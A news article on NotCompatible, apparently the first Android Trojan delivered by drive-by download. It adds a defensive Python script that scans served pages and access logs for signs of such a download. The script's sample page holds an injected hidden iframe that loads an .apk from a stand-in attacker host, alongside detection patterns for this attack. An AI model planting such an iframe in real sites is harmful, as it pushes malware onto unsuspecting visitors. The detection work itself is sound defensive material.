Android has been a target for malware creators for a while. Usually, cyberscum try to get their evil code onto your smartphone through apps masquerading as something else. They may show up briefly in the Android Market (now known as Google Play) only to be yanked once they are discovered.

But now, for the first time, researchers have spotted Android malware in the wild that reaches a device on its own, via a compromised website. Lookout, which makes smartphone security software, says it is the first Android Trojan delivered by a so-called drive-by download from a site hosting poisoned code. The malware has been given the name NotCompatible.

In this specific attack, if a user visits a compromised website from an Android device, the web browser automatically begins downloading an application without the user asking for it. This process is commonly referred to as a drive-by download. Note that the download alone does not infect the device; what the browser fetches is an Android package that still has to be installed.

When the suspicious application finishes downloading, the device displays a notification prompting the user to tap it and install the downloaded app. For that install to proceed, the device must have the “Unknown sources” setting enabled (installing apps from outside the Market this way is commonly referred to as “sideloading”). If “Unknown sources” is off, the installation is blocked.

Georgiabiker, a poster on Reddit, grabbed a screenshot of the notification that appears after the malware has been downloaded and before it is installed. Fortunately, you do get a warning, and if you’re smart, you won’t tap the Install button.

What exactly does the software do if you allow its installation? Lookout says it serves as a “relay/proxy” and doesn’t necessarily harm the device itself. But because it relays an attacker’s traffic through the phone, it could be used to reach private networks the phone is connected to:

This specific sample, while relatively well constructed, does not appear to go to great lengths to hide its intended purpose: it can be used to access private networks. This feature in itself could be significant for system IT administrators: a device infected with NotCompatible could potentially be used to gain access to normally protected information or systems, such as those maintained by enterprise or government.

Exactly how many sites have been compromised with the NotCompatible installation code is unclear. The Lookout blog mentions a couple of obscure ones and has posted the injected code so that site administrators can check their own servers for it. Lookout has also identified at least one of the Trojan’s command-and-control domains.
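The two places a site administrator can look for this kind of attack are the pages served (for injected content that points Android visitors at a package) and the access logs (for Android clients that actually fetched one). The script below is an added example written for this page; it is not Lookout’s published check and it does not reproduce the NotCompatible injection, whose exact form the page does not describe. It assumes two generic indicators: HTML that references an .apk file directly or through a hidden iframe, and Combined Log Format access-log lines in which an Android user agent downloaded an .apk. The sample page and log lines are constructed for the example.

```python
"""Scan HTML and web-server access logs for signs of a drive-by APK download.

Added example, not Lookout's check or the NotCompatible injection itself.
Assumptions: injected content references an .apk (directly or via a hidden
iframe), and the server writes Combined Log Format access logs.
"""
import re
from html.parser import HTMLParser

# An .apk reference at the end of a URL or before a query string / fragment.
APK_RE = re.compile(r"\.apk(?:[?#]|$)", re.IGNORECASE)

# Combined Log Format: ip ident user [ts] "METHOD path proto" status size "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<ref>[^"]*)" "(?P<ua>[^"]*)"'
)


class DriveByIndicatorParser(HTMLParser):
    """Collect (tag, target, reason) for elements that look like drive-by plumbing."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        # src/href cover iframe, script, a, link; content covers <meta http-equiv="refresh">.
        target = a.get("src") or a.get("href") or a.get("content") or ""
        if APK_RE.search(target):
            self.findings.append((tag, target, "apk-reference"))
        if tag == "iframe":
            style = (a.get("style") or "").replace(" ", "").lower()
            hidden = (
                "display:none" in style
                or "visibility:hidden" in style
                or a.get("width") in ("0", "1")
                or a.get("height") in ("0", "1")
            )
            if hidden:
                self.findings.append((tag, target, "hidden-iframe"))


def scan_html(html):
    """Return indicator findings for one HTML document."""
    parser = DriveByIndicatorParser()
    parser.feed(html)
    parser.close()
    return parser.findings


def android_apk_downloads(lines):
    """Return successful .apk fetches by Android clients found in access-log lines."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not Combined Log Format; skip rather than guess
        if ("android" in m["ua"].lower()
                and APK_RE.search(m["path"])
                and m["status"] in ("200", "206")):
            hits.append({"ip": m["ip"], "ts": m["ts"], "path": m["path"], "ref": m["ref"]})
    return hits


# Constructed sample page: an injected, invisible iframe pointing at a package.
SAMPLE_HTML = """<html><body>
<h1>Welcome</h1>
<iframe src="http://attacker.example/drop/app.apk"
        style="visibility: hidden; display: none;" width="1" height="1"></iframe>
<a href="/downloads/manual.pdf">Manual</a>
</body></html>"""

# Constructed sample log lines: one Android visitor fetches the .apk after the
# page load; a desktop client fetching it and a 404 are deliberately not flagged.
SAMPLE_LOG = [
    '203.0.113.7 - - [02/May/2012:10:15:01 +0000] "GET /index.html HTTP/1.1" 200 5120 "-" '
    '"Mozilla/5.0 (Linux; U; Android 2.3.6; en-us) AppleWebKit/533.1 Mobile Safari/533.1"',
    '203.0.113.7 - - [02/May/2012:10:15:02 +0000] "GET /files/app.apk HTTP/1.1" 200 70344 '
    '"http://www.example.com/index.html" '
    '"Mozilla/5.0 (Linux; U; Android 2.3.6; en-us) AppleWebKit/533.1 Mobile Safari/533.1"',
    '198.51.100.4 - - [02/May/2012:10:16:30 +0000] "GET /files/app.apk HTTP/1.1" 200 70344 "-" '
    '"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.19 Chrome/18.0 Safari/535.19"',
    '192.0.2.9 - - [02/May/2012:10:17:00 +0000] "GET /files/app.apk HTTP/1.1" 404 0 "-" '
    '"Mozilla/5.0 (Linux; Android 4.0.3) AppleWebKit/535.19 Mobile Safari/535.19"',
]

if __name__ == "__main__":
    for tag, target, reason in scan_html(SAMPLE_HTML):
        print(f"HTML: <{tag}> {target!r} [{reason}]")
    for hit in android_apk_downloads(SAMPLE_LOG):
        print(f"LOG: {hit['ip']} fetched {hit['path']} at {hit['ts']} (referrer {hit['ref']})")
```

Run it over a directory of served pages and the rotated access logs rather than the embedded samples; a hit in the log scan with a referrer on your own site is the strongest signal, because it shows the package was fetched as a side effect of a normal page load rather than by someone browsing to it directly.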

Smart Android owners should keep “Unknown sources” disabled unless they actually need it, and should never allow the installation of software they weren’t expecting. It may also not be a bad idea to install an antimalware app on your Android device. This may be a first, but it certainly won’t be the last.